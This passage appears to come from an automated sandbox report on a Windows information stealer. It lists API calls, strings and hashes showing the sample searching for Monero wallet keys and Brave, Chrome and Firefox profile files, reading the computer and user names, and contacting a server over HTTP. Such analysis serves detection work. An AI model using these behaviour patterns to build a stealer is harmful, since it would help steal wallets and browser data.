                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00924839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00924849
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: fe9153437144bae6157982e279cc2853901b16c9562f9217eae8f8856e9f83a3
                  • Instruction ID: 1dd9e5688ae9b2bcf4b80db3d188437ea6ee05673642509a33ef269169053f36
                  • Opcode Fuzzy Hash: fe9153437144bae6157982e279cc2853901b16c9562f9217eae8f8856e9f83a3
                  • Instruction Fuzzy Hash: 78215EB1D01209ABDF10DFA4E855BDE7B79FB45320F008625F955AB2C0EB706A09CF91

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 00926280: InternetOpenA.WININET(00940DFE,00000001,00000000,00000000,00000000), ref: 009262E1
                    • Part of subcall function 00926280: StrCmpCA.SHLWAPI(?,0105E790), ref: 00926303
                    • Part of subcall function 00926280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00926335
                    • Part of subcall function 00926280: HttpOpenRequestA.WININET(00000000,GET,?,0105EAD0,00000000,00000000,00400100,00000000), ref: 00926385
                    • Part of subcall function 00926280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009263BF
                    • Part of subcall function 00926280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009263D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00935228
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 6444a29d127700d06ee15015929f3a4b9c1018b2b2ae58fdfcad15332cfe58e7
                  • Instruction ID: b6949e24f61cb7ddd7e12444cef3b64a59d3c97198afd726b15b8f25461b8c54
                  • Opcode Fuzzy Hash: 6444a29d127700d06ee15015929f3a4b9c1018b2b2ae58fdfcad15332cfe58e7
                  • Instruction Fuzzy Hash: C7110C31910148ABCB14FF64DD92FED7378AF90300F804558F95A5B592EF34AB06CE92
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0092112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00921132
                  • ExitProcess.KERNEL32 ref: 00921143
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: a4f673ccab7396b8d9afa148c50024c5e84fdf98005584cf7980fb6ced6e43d9
                  • Instruction ID: 7ab0dfb2bf2fd12ef19502ed5a070f6baa9eb7a7c611b63f9c4794c912cce1f3
                  • Opcode Fuzzy Hash: a4f673ccab7396b8d9afa148c50024c5e84fdf98005584cf7980fb6ced6e43d9
                  • Instruction Fuzzy Hash: ABE0E670985308FBEB106BA0AC0AB197678AB04B01F104154F709771D5DAF92A509A99
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009210B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009210F7
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 7bb5ea39fac9841338571596f1e2ebf5423e401d4eba31f9e6855556ddd91aca
                  • Instruction ID: 2305d3bb32cc39764018fde19265fa43d29b56821256c0f521c884dc6257fdc8
                  • Opcode Fuzzy Hash: 7bb5ea39fac9841338571596f1e2ebf5423e401d4eba31f9e6855556ddd91aca
                  • Instruction Fuzzy Hash: 33F0E271681318BBEB149AA4AC59FBBB7ECE705B15F301848F504E3280D972AE00CAA0
                  APIs
                    • Part of subcall function 009378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937910
                    • Part of subcall function 009378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00937917
                    • Part of subcall function 009378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0093792F
                    • Part of subcall function 00937850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009211B7), ref: 00937880
                    • Part of subcall function 00937850: RtlAllocateHeap.NTDLL(00000000), ref: 00937887
                    • Part of subcall function 00937850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0093789F
                  • ExitProcess.KERNEL32 ref: 009211C6
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: b415cdfc92e17db00bedcc8899f6d90c581e57cc0a06de9292630c9b53b72875
                  • Instruction ID: 1d8f83bd390acee0f21894f8fd31844a64ee707968b09b0f40de293fd252e24d
                  • Opcode Fuzzy Hash: b415cdfc92e17db00bedcc8899f6d90c581e57cc0a06de9292630c9b53b72875
                  • Instruction Fuzzy Hash: 80E012B591430953CE1073F4BC4BB2B369C5B64345F040425FA09E3153FEA9F8208D66
                  APIs
                  • wsprintfA.USER32 ref: 009338CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 009338E3
                  • lstrcat.KERNEL32(?,?), ref: 00933935
                  • StrCmpCA.SHLWAPI(?,00940F70), ref: 00933947
                  • StrCmpCA.SHLWAPI(?,00940F74), ref: 0093395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00933C67
                  • FindClose.KERNEL32(000000FF), ref: 00933C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: 77c64638ad123684aedec5e94c4137ad0afa85e23bec3ac5d2b65c8ef7768b74
                  • Instruction ID: 2668918b4789cbd1045a465e0e54749fd994adb1a62bc797954c4b8a4219a7b7
                  • Opcode Fuzzy Hash: 77c64638ad123684aedec5e94c4137ad0afa85e23bec3ac5d2b65c8ef7768b74
                  • Instruction Fuzzy Hash: F3A100B19402189BDB24DFA4DC85FEE7379BB98300F048598F64DA7181EB759B84CF62
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • FindFirstFileA.KERNEL32(00000000,?,00940B32,00940B2B,00000000,?,?,?,009413F4,00940B2A), ref: 0092BEF5
                  • StrCmpCA.SHLWAPI(?,009413F8), ref: 0092BF4D
                  • StrCmpCA.SHLWAPI(?,009413FC), ref: 0092BF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0092C7BF
                  • FindClose.KERNEL32(000000FF), ref: 0092C7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: 4a2d14dc177e489e663bf0e60e9bcd7b11757f2bcc1942138aa1ac40dfcef1ca
                  • Instruction ID: 27818e2c37988327f8f63d7209d9189f50ca00e9a0d2b484120c5a12cfb56456
                  • Opcode Fuzzy Hash: 4a2d14dc177e489e663bf0e60e9bcd7b11757f2bcc1942138aa1ac40dfcef1ca
                  • Instruction Fuzzy Hash: 78424D72900108ABCB14FB60DD96FEE737DABD4300F404558F94AA7195EE34AB49CFA2
                  APIs
                  • wsprintfA.USER32 ref: 0093492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 00934943
                  • StrCmpCA.SHLWAPI(?,00940FDC), ref: 00934971
                  • StrCmpCA.SHLWAPI(?,00940FE0), ref: 00934987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00934B7D
                  • FindClose.KERNEL32(000000FF), ref: 00934B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: fdf89ea1b96e8e5e2209eb3e8f319f14cd9474e821bfff380a3293859cb24beb
                  • Instruction ID: 251bcc3cba8a04cd9ee682d097dc2b0382ded0a4d9ba637ebdeffec0badc97b1
                  • Opcode Fuzzy Hash: fdf89ea1b96e8e5e2209eb3e8f319f14cd9474e821bfff380a3293859cb24beb
                  • Instruction Fuzzy Hash: 826112B1910218ABCB24EBA0DC45FEA737CBB88701F044598F609A7181EE75EB858F91
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00934580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00934587
                  • wsprintfA.USER32 ref: 009345A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 009345BD
                  • StrCmpCA.SHLWAPI(?,00940FC4), ref: 009345EB
                  • StrCmpCA.SHLWAPI(?,00940FC8), ref: 00934601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0093468B
                  • FindClose.KERNEL32(000000FF), ref: 009346A0
                  • lstrcat.KERNEL32(?,0105E730), ref: 009346C5
                  • lstrcat.KERNEL32(?,0105DAF8), ref: 009346D8
                  • lstrlen.KERNEL32(?), ref: 009346E5
                  • lstrlen.KERNEL32(?), ref: 009346F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 02b2020aae5a7f3bc26f27edfe46c5a3f3aa78cb4f5ddf259d6f879fc06db3ff
                  • Instruction ID: ed534c28a1aff7670ef7197b72e3cb11dd9a725ef90b46d66061527048def42b
                  • Opcode Fuzzy Hash: 02b2020aae5a7f3bc26f27edfe46c5a3f3aa78cb4f5ddf259d6f879fc06db3ff
                  • Instruction Fuzzy Hash: F3514A715502189BCB24EB70DC89FEE777CAB94700F404598F609A7191EF75EB848F91
                  APIs
                  • wsprintfA.USER32 ref: 00933EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 00933EDA
                  • StrCmpCA.SHLWAPI(?,00940FAC), ref: 00933F08
                  • StrCmpCA.SHLWAPI(?,00940FB0), ref: 00933F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0093406C
                  • FindClose.KERNEL32(000000FF), ref: 00934081
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 19339e2a9157e8b03ba6d499c1b1767551b2c696326572ba3ede0a99687fffc3
                  • Instruction ID: 41c174e06e8eef46c9dca72f613e5e0d868a5fc4421919276769e8e3cf3b1166
                  • Opcode Fuzzy Hash: 19339e2a9157e8b03ba6d499c1b1767551b2c696326572ba3ede0a99687fffc3
                  • Instruction Fuzzy Hash: 0C5115B5900218ABCB24EBB0DC85FEA737CBB94300F404598F65997180DF75EB858F95
                  APIs
                  • wsprintfA.USER32 ref: 0092ED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 0092ED55
                  • StrCmpCA.SHLWAPI(?,00941538), ref: 0092EDAB
                  • StrCmpCA.SHLWAPI(?,0094153C), ref: 0092EDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0092F2AE
                  • FindClose.KERNEL32(000000FF), ref: 0092F2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: feb214cab59eb70ee4d52d1e2460ab09303fa584fbfa2a03a81ee4cba8bab0c4
                  • Instruction ID: ee2f060bc2c029bf9818057c413013e7b60a9ba259f985f07235bb39504dccea
                  • Opcode Fuzzy Hash: feb214cab59eb70ee4d52d1e2460ab09303fa584fbfa2a03a81ee4cba8bab0c4
                  • Instruction Fuzzy Hash: 89E1C272911118AADB54FB60DC92FEE737CAF94300F4045E9B54A62092EF346F8ACF56
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: #Y}$.{$@>$M[gz$TP1M$XKB$`Hr~$eX$r$fQW}$+7~$0o.$]~S
                  • API String ID: 0-3338583099
                  • Opcode ID: 430031bc61d8fb4261c36f8786ff51cafd4ec94452544d69f3e5432eb9babb03
                  • Instruction ID: e669a9f36fabde5581d40edb9681a4b86d60d2887a63f0cc02be824d78224e8a
                  • Opcode Fuzzy Hash: 430031bc61d8fb4261c36f8786ff51cafd4ec94452544d69f3e5432eb9babb03
                  • Instruction Fuzzy Hash: 7DB229F3A0C2049FE3046E2DEC8567ABBE5EF94320F1A493DEAC5C7740EA7558058697
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009415B8,00940D96), ref: 0092F71E
                  • StrCmpCA.SHLWAPI(?,009415BC), ref: 0092F76F
                  • StrCmpCA.SHLWAPI(?,009415C0), ref: 0092F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0092FAB1
                  • FindClose.KERNEL32(000000FF), ref: 0092FAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: e9ee448e40751af583d98d0a879157dc2d141578470407d118264e0d09162158
                  • Instruction ID: bbfdad0818441c128928076b44a1f77e3fa02f704b5abfac249b5db9c34b87ad
                  • Opcode Fuzzy Hash: e9ee448e40751af583d98d0a879157dc2d141578470407d118264e0d09162158
                  • Instruction Fuzzy Hash: EAB13E71900118ABDB24FB60DC96FEE7379AFD4300F4085A8E54A97195EF346B49CF92
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0094510C,?,?,?,009451B4,?,?,00000000,?,00000000), ref: 00921923
                  • StrCmpCA.SHLWAPI(?,0094525C), ref: 00921973
                  • StrCmpCA.SHLWAPI(?,00945304), ref: 00921989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00921D40
                  • DeleteFileA.KERNEL32(00000000), ref: 00921DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00921E20
                  • FindClose.KERNEL32(000000FF), ref: 00921E32
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                   • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 68dca5ba7777e9d212e6e859396f33f404f6221852f2f0eea6bb8dc252ad169e
                  • Instruction ID: ab0b2bae9f502d8cda696402695492de3e301d30dcab4c14bd30db51228900b7
                  • Opcode Fuzzy Hash: 68dca5ba7777e9d212e6e859396f33f404f6221852f2f0eea6bb8dc252ad169e
                  • Instruction Fuzzy Hash: AB121271910118ABDB19FB60DC96FEE737CAF94300F414599B14AA6091EF706F89CFA2
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00940C2E), ref: 0092DE5E
                  • StrCmpCA.SHLWAPI(?,009414C8), ref: 0092DEAE
                  • StrCmpCA.SHLWAPI(?,009414CC), ref: 0092DEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0092E3E0
                  • FindClose.KERNEL32(000000FF), ref: 0092E3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                   • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
